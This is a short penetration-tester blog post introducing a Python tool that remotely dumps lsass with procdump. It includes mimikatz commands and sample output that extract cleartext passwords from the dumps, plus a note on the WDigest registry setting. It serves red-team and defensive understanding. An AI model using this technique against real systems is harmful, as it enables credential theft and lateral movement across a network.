Monday 23 September 2019

humptydumpty

Recently I have been quite successful with the procdump technique: dumping lsass, retrieving the dump file and processing it offline to find credentials from a compromised machine.
When I used this during an engagement it ultimately led to me obtaining DA (Domain Admin), so ever since then I have found it very useful.

I've created a Python tool to automate this. Run it against a single target or against a list of IPs/hostnames.
It will upload procdump, dump lsass and download the dump file.

Check it out here:

https://github.com/n33dle/humptydumpty/

The idea is that once you have some authenticated access in a domain, say local administrator on all workstations, this tool lets you quickly obtain lsass dumps from a list of remote machines.
I stress that dumping lsass could result in a BSOD, so take care when flying this across a network!

Running each of the dump files through mimikatz can then provide you with additional credentials within the network. Note that cleartext passwords under wdigest, as in the output below, only appear where WDigest credential caching is enabled: on by default on Windows 7 / Server 2008 R2 and on Windows 8 / Server 2012, off by default on 8.1 / 2012 R2 and later unless UseLogonCredential is set to 1 under HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest. Otherwise expect NTLM hashes rather than cleartext.

For example:

mimikatz # sekurlsa::Minidump humpty-10.1.1.5.dmp
Switch to MINIDUMP : 'humpty-10.1.1.5.dmp'

mimikatz # sekurlsa::logonPasswords full
Opening : 'humpty-10.1.1.5.dmp' file for minidump...

<snip>
        wdigest :
         * Username : victim3
         * Domain   : vulnerable
         * Password : NonHackable
<snip>
         * Username : victim2
         * Domain   : vulnerable
         * Password : TheEarthIsRound!
<snip>
         * Username : victim
         * Domain   : vulnerable
         * Password : TheEarthIsFlat!
<snip>